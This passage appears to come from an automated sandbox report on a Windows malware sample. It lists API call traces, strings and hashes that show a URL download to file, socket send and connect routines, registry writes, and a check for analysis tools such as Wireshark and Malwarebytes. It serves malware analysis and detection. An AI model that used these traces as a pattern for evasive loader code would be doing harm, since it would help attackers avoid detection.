                                                                                                • Instruction Fuzzy Hash: 94313B35840A35EAF721DF758D88B1A3EE6EB493A1B14C526E414D72B4FB36D481CF50
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset$_wcsrchrlstrcat$EnvironmentExpandStringslstrlenwsprintf
                                                                                                • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                                                                                                • API String ID: 3970221696-33419044
                                                                                                • Opcode ID: 6db681fb808a24597d17d64811f62faf7112bd7359ebe2d5226212df3ac48f3e
                                                                                                • Instruction ID: c047dd82519c740f7241667319a4bcf2fd3a3be0554f772a522b5a16afdd5adb
                                                                                                • Opcode Fuzzy Hash: 6db681fb808a24597d17d64811f62faf7112bd7359ebe2d5226212df3ac48f3e
                                                                                                • Instruction Fuzzy Hash: C351EAB5A8031D6ADB20E7A4CC45FEE737CEF54700F0045D4A709EA1C0EB749698CBA2
                                                                                                APIs
                                                                                                • LoadLibraryW.KERNEL32(wininet.dll), ref: 037F7CC3
                                                                                                • GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 037F7CD7
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 037F7CF7
                                                                                                • GetProcAddress.KERNEL32(00000000,InternetOpenUrlW), ref: 037F7D16
                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 037F7D53
                                                                                                • _memset.LIBCMT ref: 037F7D7E
                                                                                                • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 037F7D8C
                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 037F7DDB
                                                                                                • CloseHandle.KERNEL32(?), ref: 037F7DF9
                                                                                                • Sleep.KERNEL32(00000001), ref: 037F7E01
                                                                                                • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 037F7E0D
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 037F7E28
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWrite_memset
                                                                                                • String ID: InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$MSIE 6.0$wininet.dll
                                                                                                • API String ID: 1463273941-1099148085
                                                                                                • Opcode ID: 5b83a842f19a77253a73f778efce19d901afa698687820c4a880c92cd8b0d705
                                                                                                • Instruction ID: f8da893d61c0c8a870e23004bf74445f426ea8d5175e7cd6926094a3402748cb
                                                                                                • Opcode Fuzzy Hash: 5b83a842f19a77253a73f778efce19d901afa698687820c4a880c92cd8b0d705
                                                                                                • Instruction Fuzzy Hash: 92416E71A40228AFD724EB648C41FEEB3FCBF44700F14C5E9E658A6280DE745A458FE4
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000064), ref: 037F455A
                                                                                                • timeGetTime.WINMM ref: 037F457B
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 037F459B
                                                                                                • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 037F45BD
                                                                                                • SwitchToThread.KERNEL32 ref: 037F45D7
                                                                                                • SetEvent.KERNEL32(?), ref: 037F4620
                                                                                                • CloseHandle.KERNEL32(?), ref: 037F4644
                                                                                                • send.WS2_32(?,038149C0,00000010,00000000), ref: 037F4668
                                                                                                • SetEvent.KERNEL32(?), ref: 037F4686
                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 037F4691
                                                                                                • WSACloseEvent.WS2_32(?), ref: 037F469F
                                                                                                • shutdown.WS2_32(?,00000001), ref: 037F46B3
                                                                                                • closesocket.WS2_32(?), ref: 037F46BD
                                                                                                • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 037F46F6
                                                                                                • SetLastError.KERNEL32(000005B4), ref: 037F470A
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 037F472B
                                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 037F4743
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventExchangeInterlockedThread$CloseCurrentErrorLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                                • String ID:
                                                                                                • API String ID: 1692523546-0
                                                                                                • Opcode ID: 28ec5ff3de399220ad1f102f7dc306c4750dfdb461ce41e41f5954f3beb6eb43
                                                                                                • Instruction ID: 0fa6a98a45d831770627c059f716ac5e9e39546948fd982e590a596f0c7bdd53
                                                                                                • Opcode Fuzzy Hash: 28ec5ff3de399220ad1f102f7dc306c4750dfdb461ce41e41f5954f3beb6eb43
                                                                                                • Instruction Fuzzy Hash: 0F91CC74200A16EFC724EF26D888B6AF7A9FF44705F048569E6168B794C731F890CBD0
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset$swprintf$_malloc
                                                                                                • String ID: %s %s$onlyloadinmyself$plugmark
                                                                                                • API String ID: 1873853019-591889663
                                                                                                • Opcode ID: 0cf7a791aec0ed71ac5c25e84b8a2c5b5e40ddb50d4b7afb0089da892170300a
                                                                                                • Instruction ID: cac0a013e79529a83d019c01412962c842ca0c3cff1186e6ad160580b7239388
                                                                                                • Opcode Fuzzy Hash: 0cf7a791aec0ed71ac5c25e84b8a2c5b5e40ddb50d4b7afb0089da892170300a
                                                                                                • Instruction Fuzzy Hash: 3881C7B5A40300AFE710EB54DC86F6B7764BF45710F1941A4EE199F382EB71E921C6A2
                                                                                                APIs
                                                                                                • IsWindowVisible.USER32(?), ref: 037F5CD3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: VisibleWindow
                                                                                                • String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
                                                                                                • API String ID: 1208467747-3439171801
                                                                                                • Opcode ID: b84817e9e061a8df5d8dd25dfa022a8c97ac39ee6833be2189a097bbef8ade61
                                                                                                • Instruction ID: 48382da2fd85371e3114d6e246b55c75aaefe2075eba16591c91ece8b8799bfb
                                                                                                • Opcode Fuzzy Hash: b84817e9e061a8df5d8dd25dfa022a8c97ac39ee6833be2189a097bbef8ade61
                                                                                                • Instruction Fuzzy Hash: 564180E7E417112EDAA1E5B5DE02F9F624C1E639AAB0800E5ED18EC305F74DD22540EF
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000064), ref: 1000455A
                                                                                                • timeGetTime.WINMM ref: 1000457B
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 1000459B
                                                                                                • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 100045BD
                                                                                                • SwitchToThread.KERNEL32 ref: 100045D7
                                                                                                • SetEvent.KERNEL32(?), ref: 10004620
                                                                                                • CloseHandle.KERNEL32(?), ref: 10004644
                                                                                                • send.WS2_32(?,10017440,00000010,00000000), ref: 10004668
                                                                                                • SetEvent.KERNEL32(?), ref: 10004686
                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 10004691
                                                                                                • WSACloseEvent.WS2_32(?), ref: 1000469F
                                                                                                • shutdown.WS2_32(?,00000001), ref: 100046B3
                                                                                                • closesocket.WS2_32(?), ref: 100046BD
                                                                                                • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 100046F6
                                                                                                • SetLastError.KERNEL32(000005B4), ref: 1000470A
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 1001FA44
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: EventThread$CloseCurrentErrorExchangeInterlockedLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                                • String ID:
                                                                                                • API String ID: 3448239111-0
                                                                                                • Opcode ID: 8d79b15aa9448fa8a40132b16a0a16f3e48fc421b71208ac07a5b091827d0d03
                                                                                                • Instruction ID: f154daa7adb366bc59dc3c87c5a832f84626f43c2ad915a7de221fbbd04ec74e
                                                                                                • Opcode Fuzzy Hash: 8d79b15aa9448fa8a40132b16a0a16f3e48fc421b71208ac07a5b091827d0d03
                                                                                                • Instruction Fuzzy Hash: CC51F4B4600A22EFE311DF60CCC8B99B7A5FF09782F114115E5058B694DB72F8A0CBD5
                                                                                                APIs
                                                                                                • SetLastError.KERNEL32(0000000D,?,?,?,?,?,?,037FA8C1,?,?), ref: 037FDA43
                                                                                                • SetLastError.KERNEL32(000000C1,?,?,?,?,?,?,037FA8C1,?,?), ref: 037FDA62
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 1452528299-0
                                                                                                • Opcode ID: 8e0226cc3b64850034cb695274435c8558f4e7c2b82e8a26449cefac7f970f0c
                                                                                                • Instruction ID: b600c171300ec9920d252c81975bbc9ceba14df7140f2cce72b147c96419e29b
                                                                                                • Opcode Fuzzy Hash: 8e0226cc3b64850034cb695274435c8558f4e7c2b82e8a26449cefac7f970f0c
                                                                                                • Instruction Fuzzy Hash: 9C81BF727006059FD730EFA9D884B6AF7E8FB48325F0446A9EA09CB744E771E940CB95
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 037FC63D
                                                                                                • _memset.LIBCMT ref: 037FC64C
                                                                                                • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,00000000), ref: 037FC66F
                                                                                                  • Part of subcall function 037FC81E: RegCloseKey.ADVAPI32(80000000,037FC7FA), ref: 037FC82B
                                                                                                  • Part of subcall function 037FC81E: RegCloseKey.ADVAPI32(00000000), ref: 037FC834
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Close_memset$Open
                                                                                                • String ID: %08X
                                                                                                • API String ID: 4292648718-3773563069
                                                                                                • Opcode ID: aed0214dd0d1fe8ccd0d08fc4f17586fbc627dac8d3a85164102db010a01db50
                                                                                                • Instruction ID: 9c87dde7f19eb0200b002dc3893fd7b8e535435ad0fc36cac2628ba7cf4bbdc7
                                                                                                • Opcode Fuzzy Hash: aed0214dd0d1fe8ccd0d08fc4f17586fbc627dac8d3a85164102db010a01db50
                                                                                                • Instruction Fuzzy Hash: 4B514DB2A40219AFDB25EF90CC85FEAB77CFB44704F404699E705AA180D774AB44CBA5
                                                                                                APIs
                                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 037F3710
                                                                                                • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 037F3749
                                                                                                • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 037F3766
                                                                                                • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 037F3779
                                                                                                • WSACreateEvent.WS2_32 ref: 037F377B
                                                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,03821F0C), ref: 037F378D
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,03821F0C), ref: 037F3799
                                                                                                • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,03821F0C), ref: 037F37B8
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,03821F0C), ref: 037F37C4
                                                                                                • gethostbyname.WS2_32(00000000), ref: 037F37D2
                                                                                                • htons.WS2_32(?), ref: 037F37F8
                                                                                                • WSAEventSelect.WS2_32(?,?,00000030), ref: 037F3816
                                                                                                • connect.WS2_32(?,?,00000010), ref: 037F382B
                                                                                                • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,03821F0C), ref: 037F383A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                • String ID:
                                                                                                • API String ID: 1455939504-0
                                                                                                • Opcode ID: 843198b3bb54a00658f81bd368125f4eaff90ea8fc6dddefabdeb00aa4f5f628
                                                                                                • Instruction ID: d552a2b1c58db4133a2819964e3901884cb2c43b9dfa4e8f6d7f261bcb7c2b31
                                                                                                • Opcode Fuzzy Hash: 843198b3bb54a00658f81bd368125f4eaff90ea8fc6dddefabdeb00aa4f5f628
                                                                                                • Instruction Fuzzy Hash: 03415EB5A40205AFE724EBA4DC89F7EB7BCFB88710F104659F7259A2D0C674A904DB60
                                                                                                APIs
                                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 10003710
                                                                                                • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 10003749
                                                                                                • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 10003766
                                                                                                • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 10003779
                                                                                                • WSACreateEvent.WS2_32 ref: 1000377B
                                                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,1001D990), ref: 1000378D
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,1001D990), ref: 10003799
                                                                                                • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,1001D990), ref: 100037B8
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,1001D990), ref: 100037C4
                                                                                                • gethostbyname.WS2_32(00000000), ref: 100037D2
                                                                                                • htons.WS2_32(?), ref: 100037F8
                                                                                                • WSAEventSelect.WS2_32(?,?,00000030), ref: 10003816
                                                                                                • connect.WS2_32(?,?,00000010), ref: 1000382B
                                                                                                • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,1001D990), ref: 1000383A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                • String ID:
                                                                                                • API String ID: 1455939504-0
                                                                                                • Opcode ID: 717cd69355dde577bb5fef79b8aa358efc8542f3cb33ac356917f685119aa9e6
                                                                                                • Instruction ID: 3f7f27d39b3a29da93cc6ce51bc3e722b1ee51b6efc1866e7789f3871d2ad327
                                                                                                • Opcode Fuzzy Hash: 717cd69355dde577bb5fef79b8aa358efc8542f3cb33ac356917f685119aa9e6
                                                                                                • Instruction Fuzzy Hash: E74160B1A40205ABE711DBA4CC89F6FB7B8EB48711F108619FA159B2D0DA71A904CB60
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?,4EB10097), ref: 037FAA58
                                                                                                • wsprintfW.USER32 ref: 037FAA8F
                                                                                                • _memset.LIBCMT ref: 037FAAA7
                                                                                                • _memset.LIBCMT ref: 037FAABA
                                                                                                  • Part of subcall function 037F8020: lstrlenW.KERNEL32(?), ref: 037F8038
                                                                                                  • Part of subcall function 037F8020: _memset.LIBCMT ref: 037F8042
                                                                                                  • Part of subcall function 037F8020: lstrlenW.KERNEL32(?), ref: 037F804B
                                                                                                  • Part of subcall function 037F8020: lstrlenW.KERNEL32(?), ref: 037F8056
                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 037FABBE
                                                                                                • Sleep.KERNEL32(000003E8,?,?,?,?,?,?), ref: 037FAC6E
                                                                                                • CloseHandle.KERNEL32(?), ref: 037FACAA
                                                                                                  • Part of subcall function 037FF707: _malloc.LIBCMT ref: 037FF721
                                                                                                  • Part of subcall function 037F9730: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,4EB10097,00000000,?,?,?,00000000,0381125B,000000FF,?,037FE04E,00000000), ref: 037F9773
                                                                                                  • Part of subcall function 037F9730: InitializeCriticalSectionAndSpinCount.KERNEL32(037FE1AE,00000000,?,?,?,00000000,0381125B,000000FF,?,037FE04E), ref: 037F9812
                                                                                                  • Part of subcall function 037F9730: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0381125B,000000FF,?,037FE04E), ref: 037F9850
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateEvent_memsetlstrlen$CloseCountCriticalHandleInitializeLocalSectionSleepSpinTime_mallocwsprintf
                                                                                                • String ID: %4d.%2d.%2d-%2d:%2d:%2d$o1:$p1:$t1:
                                                                                                • API String ID: 1254190970-1225219777
                                                                                                • Opcode ID: ab28ec07a29ef1fe56802bda951bad80ab03716b0eabf9ab31184594f43e54f1
                                                                                                • Instruction ID: 4b6eefeccfc536c1535fe96b964e0663a0d6a56b1d08f7cffc8dddd83c548a5a
                                                                                                • Opcode Fuzzy Hash: ab28ec07a29ef1fe56802bda951bad80ab03716b0eabf9ab31184594f43e54f1
                                                                                                • Instruction Fuzzy Hash: CB6171B1504340AFD7A0DF68D884EABB7EDBF89714F004A1DF69987280E7349544CBA7
                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,AppEvents,00000000,00000002,?), ref: 037FC889
                                                                                                • RegDeleteValueW.ADVAPI32(?), ref: 037FC894
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 037FC8A4
                                                                                                • RegCreateKeyW.ADVAPI32(80000001,AppEvents,?), ref: 037FC8C3
                                                                                                • lstrlenW.KERNEL32(?), ref: 037FC8D1
                                                                                                • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 037FC8E4
                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 037FC8F2
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 037FC900
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Close$Value$CreateDeleteOpenlstrlen
                                                                                                • String ID: AppEvents$Network
                                                                                                • API String ID: 3935456190-3733486940
                                                                                                • Opcode ID: a835e405f1327ad6c85ca970bcfaed87ab8352653cffc09fb001d23653f5f82f
                                                                                                • Instruction ID: a317324be8216ca769bd3f480fb59c6adc500111522ee33299b0cb1f5f255ac2
                                                                                                • Opcode Fuzzy Hash: a835e405f1327ad6c85ca970bcfaed87ab8352653cffc09fb001d23653f5f82f
                                                                                                • Instruction Fuzzy Hash: 05114CB5A00208FFE725DAA5EC89FABB36CEB49750F104589FB05E7240D671EE10D7A4
                                                                                                APIs
                                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,4B556414), ref: 10005A65
                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 10005B04
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 10005B42
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 10005B67
                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 10005C5F
                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 10005C80
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 10005B8C
                                                                                                  • Part of subcall function 10001280: __CxxThrowException@8.LIBCMT ref: 10001290
                                                                                                  • Part of subcall function 10001280: DeleteCriticalSection.KERNEL32(00000000,?,10017E78), ref: 100012A1
                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 10005CF1
                                                                                                • timeGetTime.WINMM ref: 10005CF7
                                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 10005D0B
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 10005D14
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                                • String ID:
                                                                                                • API String ID: 1400036169-0
                                                                                                • Opcode ID: c8c359a865a91754db648c7caefba5610723c896864770a6932f917ef1d9d91d
                                                                                                • Instruction ID: f393ff6f41c53dec0a4a663a217bd1082015950f507b03806f4406e75142b299
                                                                                                • Opcode Fuzzy Hash: c8c359a865a91754db648c7caefba5610723c896864770a6932f917ef1d9d91d
                                                                                                • Instruction Fuzzy Hash: 7AA1D7B0A01A56AFE354CF6AC8C479AFBE8FB08344F50862EE11DD7640D775A964CF90
                                                                                                APIs
                                                                                                • SetLastError.KERNEL32(0000139F,4EB10097,?,?,?,?,00000000,000000FF,00000000), ref: 037F4CE6
                                                                                                • EnterCriticalSection.KERNEL32(?,4EB10097,?,?,?,?,00000000,000000FF,00000000), ref: 037F4D0D
                                                                                                • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 037F4D21
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 037F4D28
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                • String ID:
                                                                                                • API String ID: 2124651672-0
                                                                                                • Opcode ID: ce735f95cdd38fcda2b39f66fd3e4a0568be529676327f90f3c5ad5904c91e21
                                                                                                • Instruction ID: 1978269a8c78b3cabeb7f29fb870b8d40fc76a8e028ef3a6ec4b99789b4faf61
                                                                                                • Opcode Fuzzy Hash: ce735f95cdd38fcda2b39f66fd3e4a0568be529676327f90f3c5ad5904c91e21
                                                                                                • Instruction Fuzzy Hash: FF518E76A047059FC724EFA9E485A6EF7F8FF48710F044AAEEA1AD7740DB35A4008B51
                                                                                                APIs
                                                                                                • SetLastError.KERNEL32(0000139F,4B556414,745947A0,?,?,00000001), ref: 10004CC6
                                                                                                • EnterCriticalSection.KERNEL32(?,4B556414,745947A0,?,?,00000001), ref: 10004CED
                                                                                                • SetLastError.KERNEL32(0000139F), ref: 10004D01
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 10004D08
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                • String ID:
                                                                                                • API String ID: 2124651672-0
                                                                                                • Opcode ID: f9e9e3c5f85a9396c58d0e811c6a772e6e8b8bf194744a3e55c98ac89ef18c7f
                                                                                                • Instruction ID: f936773d66b76d96f3ecbf8df82172045f4aecfa059d2fdb31757c61ce649d4c
